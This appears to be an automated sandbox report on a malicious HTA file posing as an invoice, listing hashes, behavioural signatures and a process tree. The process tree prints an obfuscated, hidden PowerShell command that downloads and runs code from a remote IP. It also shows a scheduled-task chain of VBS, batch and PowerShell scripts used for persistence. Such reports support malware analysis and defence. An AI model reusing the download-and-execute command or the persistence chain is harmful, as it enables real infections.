Analysis
-
max time kernel
128s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20231023-en -
resource tags
arch:x64arch:x86image:win7-20231023-enlocale:en-usos:windows7-x64system -
submitted
15/11/2023, 17:34
Static task
static1
Behavioral task
behavioral1
Sample
16112023_0133_15112023_Invoice#2356876431.hta
Resource
win7-20231023-en
General
-
Target
16112023_0133_15112023_Invoice#2356876431.hta
-
Size
371B
-
MD5
99153607b1542d57391bb96f7f6501a8
-
SHA1
87496ae7cb23b015fb8da73af5f0fd7fc1373aa2
-
SHA256
c08e13a2fe6a0b69b2c67f0fbd73c72c7c49bbdedef556da6b57197f995979e1
-
SHA512
2f2bf163d4f646421dcbb1a0110007ac87701c81e57ac89335ca477784e976985d6bee92b79d1be73b327ecbfddfb399ce5a45ead6dc8f223be6d15a28cf850c
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 3 2888 mshta.exe 5 2704 powershell.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2704 powershell.exe 2788 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2704 powershell.exe Token: SeDebugPrivilege 2788 powershell.exe -
Suspicious use of WriteProcessMemory 13 IoCs
description pid Process procid_target PID 2888 wrote to memory of 2704 2888 mshta.exe 28 PID 2888 wrote to memory of 2704 2888 mshta.exe 28 PID 2888 wrote to memory of 2704 2888 mshta.exe 28 PID 2888 wrote to memory of 2704 2888 mshta.exe 28 PID 1224 wrote to memory of 1724 1224 taskeng.exe 34 PID 1224 wrote to memory of 1724 1224 taskeng.exe 34 PID 1224 wrote to memory of 1724 1224 taskeng.exe 34 PID 1724 wrote to memory of 960 1724 WScript.exe 35 PID 1724 wrote to memory of 960 1724 WScript.exe 35 PID 1724 wrote to memory of 960 1724 WScript.exe 35 PID 960 wrote to memory of 2788 960 cmd.exe 37 PID 960 wrote to memory of 2788 960 cmd.exe 37 PID 960 wrote to memory of 2788 960 cmd.exe 37
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\16112023_0133_15112023_Invoice#2356876431.hta"1⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2888 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='/-/--/-/(''http://185.81.157.213:222/8X.jpg'')'.RePLACe('/-/--/-/','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2704
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {0BB06A32-9F4E-44DC-822A-1C2DA145C618} S-1-5-21-2085049433-1067986815-1244098655-1000:AHLBRYJO\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
PID:1224 -
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\Users\Public\Conted.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:1724 -
C:\Windows\System32\cmd.execmd /c ""C:\Users\Public\Conted.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:960 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\Conted.ps1'"4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2788
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7C56MLPQ9URVD4E08GK6.temp
Filesize7KB
MD5b736b7049ac70ea3c2bde2fa7c318379
SHA16e34afeefd821bfc50417181197157cc7a980ba0
SHA256a10aeb64e89586ddc3de876ca9edbf394a4fe80fb89f97ff26aa5b6674ef8201
SHA5123f2002fd6a90f3725962e6b251d6d6e40996339596a93c2b1fb21a00e93482f1c1cf4348529248ba809f43f0940d98c9f6f8ae67adcfb7c68a4efc18e07f99a6
-
Filesize
205B
MD5759278dd3dc3679bf7efd1ec681c0aa1
SHA172b37494696deea940ac75b4c4e06e2b6ce419ef
SHA256cba344447d8228d88c93d64ffdcda1de8562ef41adc4901191548e00bbfc5f19
SHA5128b4f63354c5aa1ec4102e7aadbb2da34b2a0ba2d3ae6b8d22a70fd75c3c3b9e70cd4ce8128bd50cb400970697c49810c4ef69f96352e36ba4f2b7a647ab8a27f
-
Filesize
688B
MD5110da9d3474ba64fa1a18c173685c25d
SHA19f093829518a9268bf9807fda7bef47e7832c497
SHA256a31dbd6f7416f150403c19be69f02d5e8608f5e7fae88a29831d40db15849b60
SHA512ef5fb4415fbd12e633ad964ca132ac3be81bfacd489db788b86fc7ef245d6f51bc08faecaf24874649d0c754b1892075a28042bf8483ab85b1996a25cfa57443